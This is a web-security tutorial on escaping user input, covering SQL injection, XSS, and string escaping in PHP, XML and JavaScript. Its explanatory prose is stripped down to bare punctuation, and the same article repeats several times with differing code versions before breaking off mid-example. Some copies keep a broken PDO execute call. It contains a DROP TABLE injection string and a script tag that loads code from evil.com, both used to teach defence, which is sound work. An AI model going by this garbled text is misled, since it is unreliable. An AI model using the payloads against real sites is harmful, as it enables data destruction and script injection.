$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
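<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>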
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
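// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);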
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
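<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>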
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
